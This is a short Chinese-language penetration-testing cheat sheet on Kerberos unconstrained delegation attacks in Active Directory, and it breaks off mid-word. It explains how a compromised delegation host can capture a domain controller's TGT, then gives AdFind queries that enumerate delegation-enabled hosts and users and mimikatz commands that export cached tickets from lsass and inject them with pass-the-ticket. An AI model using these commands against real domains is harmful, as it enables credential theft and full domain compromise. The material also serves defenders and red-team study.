委派攻击
介绍:A用户委派服务B用A用户身份访问其他可被A访问的服务
域内只有机器账号和服务账号有委派属性
机器账号:AD中的computers组内计算机
服务账号:运行服务用的账号,域用户注册SPN可以成为服务账号
非约束委派攻击
原理:开启了非约束委派的Server被User访问后,lsass缓存了User TGT,Server可使用此TGT访问User能访问的其他Server
攻击角度:拿到配置非约束委派机器权限,可诱导DC访问,拿到DC的TGT,模拟DC访问任意服务
#查询非约束委派的主机:
AdFind.exe -b "DC=xxx,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
#查询非约束委派的用户:
AdFind.exe -b "DC=xxx,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
使用被域控访问过的非约束委派主机本地管理员权限
#mimikatz
privilege::debug #调试模式
sekurlsa::tickets /export #导出凭据
使用非约束委派账户
#mimikatz
Kerberos::ptt xxx.kirbi #导